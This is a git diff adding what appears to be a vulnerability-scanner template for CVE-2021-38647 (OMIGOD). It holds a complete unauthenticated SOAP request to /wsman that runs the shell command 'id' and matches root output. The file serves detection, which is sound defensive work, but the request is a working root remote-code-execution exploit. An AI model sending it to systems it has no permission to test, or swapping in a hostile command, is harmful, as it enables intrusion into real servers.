diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
new file mode 100644
index 0000000000..4c499f0b8a
--- /dev/null
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-38647
+
+info:
+  name: Open Management Infrastructure Remote Code Execution Vulnerability
+  author: daffainfo
+  severity: critical
+  tags: cve,cve2021,rce,omi
+  reference:
+    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
+
+requests:
+
+  - raw:
+      - |
+        POST /wsman HTTP/1.1
+        Connection: Keep-Alive
+        Content-Length: 1505
+        Content-Type: application/soap+xml;charset=UTF-8
+        Host: {{Hostname}}
+
+        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema">
+           <s:Header>
+              <a:To>HTTP://192.168.1.1:5986/wsman/</a:To>
+              <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+              <a:ReplyTo>
+                 <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+              </a:ReplyTo>
+              <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
+              <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+              <a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID>
+              <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+              <w:Locale xml:lang="en-us" s:mustUnderstand="false" />
+              <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
+              <w:OptionSet s:mustUnderstand="true" />
+              <w:SelectorSet>
+                 <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+              </w:SelectorSet>
+           </s:Header>
+           <s:Body>
+              <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+                 <p:command>id</p:command>
+                 <p:timeout>0</p:timeout>
+              </p:ExecuteShellCommand_INPUT>
+           </s:Body>
+        </s:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<p:StdOut>uid=0(root) gid=0(root) groups=0(root)</p:StdOut>"
+        part: body
+
+      - type: status
+        status:
+          - 200